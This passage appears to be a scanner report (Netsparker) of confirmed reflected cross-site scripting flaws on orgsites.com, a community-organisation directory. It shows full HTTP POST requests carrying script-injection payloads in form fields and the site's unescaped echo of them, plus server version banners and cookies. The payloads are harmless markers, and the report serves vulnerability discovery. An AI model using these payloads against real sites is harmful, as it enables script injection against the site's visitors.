</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align="right" valign="top"><font face="arial" size="1" color="#989868">&nbsp;0 FOUND</font></td></tr></table><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="left" valign="top"><font face="Arial,Helvetica" color="#000000" size="1"><i>NO EVENTS LISTED</i><p /></td></tr></table><p /><br><b>Warning</b>: Supplied argument is not a valid MySQL result resource in <b>/home/glnorg/cgi-bin/search_full.php3</b> on line <b>255</b><br><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value="'"--></style></script><script>netsparker(0x000455)</script>"><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value="3"><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="..
- /_TOOL_eformH.php3

/_TOOL_eformH.php3 CONFIRMED

http://www.orgsites.com/_TOOL_eformH.php3

Parameters

Parameter Type Value
cbody POST 3
email POST netsparker@example.com
fname POST '"--></style></script><script>alert(0x000464)</script>
NEadd POST Y
Zmail POST SEND IT

Request

POST /_TOOL_eformH.php3 HTTP/1.1
Referer: http://www.orgsites.com/_TOOL_eformH.php3?mailus=Mail
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Content-Length: 152
Accept-Encoding: gzip, deflate

cbody=3&email=netsparker%40example.com&fname='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000464)%3c%2fscript%3e&NEadd=Y&Zmail=SEND+IT

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:13:32 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\" /><html xmlns=\"http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><title>Talk to us at OrgSites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /></head><body bgcolor="#ffffcc"><div align="center"><font face="Verdana, Arial, Helvetica, sans-serif"><font color="#FF0000"><b>Thank you \'\"--></style></script><script>netsparker(0x000464)</script> ! ...We will reply as soon as we can.</b></font></div><br />We have also added you to our mailing list.<p />Click <a href="javascript:close()">HERE</a> to return<p /><font size="2">
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
FullSearch POST GO
gcity POST 3
gstate POST ALL
keyw POST 3
neighborhood POST '"--></style></script><script>alert(0x000489)</script>
sts POST E

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Content-Length: 144
Accept-Encoding: gzip, deflate

FullSearch=GO&gcity=3&gstate=ALL&keyw=3&neighborhood='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000489)%3c%2fscript%3e&sts=E

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:13:42 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=354424612; expires=Tue, 03-May-11 15:13:48 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="\'\"--></style></script><script>netsparker(0x000489)</script>">\'\"--></style></script><script>netsparker(0x000489)</script>
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b> Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">In 3,In All States</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align="right" valign="top"><font face="arial" size="1" color="#989868">&nbsp;58 FOUND</font></td></tr></table><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="left" valign="top"><font face="Arial,Helvetica" color="#000000" size="2"><p /><font face="verdana,arial,helvetica" size="2" color="FF0000"><b><i>TODAY !!!</i></b></font><hr noshade /><font face="verdana,arial" size="2" color="#000000"><b>USA Practice</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Group 1 Yoga: 4:<font color="#FF0000"><b>3</b></font>0-5:<font color="#FF0000"><b>3</b></font>0pm
Group 2 Bootcamp: 6:00-6:<font color="#FF0000"><b>3</b></font>0pm
Group 2 Swim: 7:15-9:00pm
Group <font color="#FF0000"><b>3</b></font> Swim: 7:15-9:<font color="#FF0000"><b>3</b></font>0pm</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ma/wtsc target="_blank">Westboro Tennis and Swim Club</a><br />(Westborough MA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>PLC Meeting</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 7:<font color="#FF0000"><b>3</b></font>0 PM @ the CEB. All Scouts in a leadership position and all ASM's are asked to attend.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=nj/troop199 target="_blank">BSA Troop 199 - Oldwick, New Jersey 08858</a><br />(Oldwick NJ, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Plant Sale</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Parents are invited to shop from 2:15 to <font color="#FF0000"><b>3</b></font>:<font color="#FF0000"><b>3</b></font>0. Sale will be outside on Massachusetts Ave.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ny/eastlakepta target="_blank">2010-2011 </a><br />(Massapequa Park NY, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Team Photo Day</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 4:<font color="#FF0000"><b>3</b></font>0pm at Kasch Park. Wear maroon kit.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=wa/tynecastle94 target="_blank">WELCOMEtoTIFC 94 online</a><br />(Everett WA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Branch Meeting</b><font face="arial" size="2" color="#000000"><br />5:30pm-8:00pm&nbsp; Upton House
<font color="#FF0000"><b>3</b></font>80 Mahoning Avenue, N.W.
Warren, Ohio

Tour of Historical Home
led by
Docents of Upton House

5:<font color="#FF0000"><b>3</b></font>0 P.M. Tour of Home
6:<font color="#FF0000"><b>3</b></font>0 P.M. Dinner
7:00 P.M. Business Meeting and Installation of 2011-2012 Officers</font></font>&nbsp;<font face="arial,helvetica" size="1"><a href="http://www.mapquest.com/maps?&1c=&1s=&1a=&1z=&1y=US&1v=ADDRESS&2c=Warren&2s=Oh&2a=380+Mahoning+Avenue&2z=44483&2y=US" target="_blank">SEE MAP</a><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=oh/warren-trumbull-aauw target="_blank">WARREN-TRUMBULL COUNTY AAUW, Warren, OH</a><br />(Warren Oh, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>KCCT Testing</b><font face="arial" size="2" color="#000000"><br />8:00am-3:00pm&nbsp; We will prepare to begin Kentucky Core Content Testing today. This is for <font color="#FF0000"><b>3</b></font>rd - 8th grades.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ky/ebispto target="_blank">East Bernstadt Schools Parent Teacher Organization</a><br />(East Bernstadt KY, USA)</font><br /><p /><font face="verdana,arial,helvetica" size="2" color="#ff6633">&nbsp;<br /><b>Tuesday May 03</b></font><hr noshade /><font face="verdana,arial" size="2" color="#000000"><b>WELCA</b><font face="arial" size="2" color="#000000"><br />-&nbsp; Ladies of the congregation will meet at 1:<font color="#FF0000"><b>3</b></font>0PM.</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=fl/reformation target="_blank">Reformation Lutheran Church</a><br />(Lakeland FL, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Weekly Meeting</b><font face="arial" size="2" color="#000000"><br />-&nbsp; 7:00 - 8:<font color="#FF0000"><b>3</b></font>0 pm
Ankeny E Free Church</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ia/ankenytroop85 target="_blank">Welcome to the Boy Scout Troop 85 Website</a><br />(Ankeny IA, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Happy Hour</b><font face="arial" size="2" color="#000000"><br />-&nbsp; <font color="#FF0000"><b>3</b></font>-6</font></font><font face="arial,helvetica" size="1"><br /><font color="#989868">MORE @ <a href=ky/american-legion-chief-paduke-post-31 target="_blank">American Legion Chief Paduke Post 31</a><br />(Paducah KY, USA)</font><br /><br /><font face="verdana,arial" size="2" color="#000000"><b>Plant Sale</b><font face="..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
neighborhood POST '"--></style></script><script>alert(0x002550)</script>
sts POST E
SRCname POST Smith
zzzip POST search

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 131
Accept-Encoding: gzip, deflate

neighborhood='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002550)%3c%2fscript%3e&sts=E&SRCname=Smith&zzzip=search

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:34:19 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=100287679; expires=Tue, 03-May-11 17:34:21 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="\'\"--></style></script><script>netsparker(0x002550)</script>">\'\"--></style></script><script>netsparker(0x002550)</script>
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="Smith" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
